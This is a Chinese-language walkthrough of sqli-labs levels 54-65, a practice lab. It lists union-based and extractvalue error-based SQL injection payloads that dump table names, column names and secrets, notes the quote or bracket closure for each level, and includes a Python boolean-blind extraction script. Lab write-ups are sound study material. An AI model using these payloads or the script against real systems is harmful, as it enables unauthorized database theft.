
sqli-labs刷题(54-65)

54 无报错 无过滤 union


ID:1
ID:1'
ID:1'--
ID:0' union select 1,2,3--
ID:0' union select 1,2,database()--
ID:0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ildvytwz6d'--
ID:0' union select 1,2,secret_54Z4 from ildvytwz6d--

55

ID:1
ID:1'
ID:1'-- 
ID:1')-- 
ID:1")-- 
ID:1)-- 
ID:0) union select 1,2,3-- 
ID:0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'-- 
ID:0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='evu5o2kvg8'-- 
ID:0) union select 1,2,secret_ZIST from evu5o2kvg8-- 

56

')

57

"

58 报错

ID:1'
ID:1' and extractvalue(1,concat(0x7e,(select user())))-- 
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))-- 
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='97g4e9dy69')))-- 
ID:1' and extractvalue(1,concat(0x7e,(select secret_KZUH from 97g4e9dy69)))-- 

59

无闭合报错

60

")闭合报错

61

'))闭合报错

各个闭合方式的布尔盲注

62

脚本模板

import requests

# Boolean-based blind probe template for the sqli-labs Less-62 exercise.
# Every request appends one injected comparison to url0; whether the string
# "Angelina" occurs in the response body is used as the true/false signal.
# Server-side view: each probe is a GET whose id parameter carries an
# ascii(mid(database(),…)) comparison, sent in a tight loop with only the
# position and threshold numbers changing — a highly regular request
# pattern that request logging and WAF rules can key on.
url0="http://sql.test/Less-62/?id=1') and "
databasename: str = ''  # I had already found by hand, using length(), that the database name is 10 characters long
# range(1, 10) walks positions 1 through 9 of database() (mid() is 1-based).
for i in range(1,10):
    # Search window for the character's ASCII code; the loop below keeps the
    # invariant min < code <= max, so the answer is read from max at the end.
    # (Shadows the builtins min/max — kept as in the original.)
    min = 33
    max = 127
    # Binary search: stop once the window is one value wide.
    while(abs(min-max)>1):
        mid = (min + max)//2
        url = url0 + "(ascii((mid(database(),{},1)))>{})--+".format(i,mid)
        print(url)
        req = requests.get(url=url)
        # "Angelina" in the page is treated as "comparison was true"
        # (presumably the lab's reference row text — verify against the target page).
        if ("Angelina" in req.text):
            min = mid   # code > mid
        else:
            max = mid   # code <= mid
        # print(abs(min-max))
    # With max - min == 1 the invariant leaves exactly one candidate: max.
    databasename+=chr(max)
    print(databasename)

63 单引号闭合

'

64 双括号

))

65 单括号

)
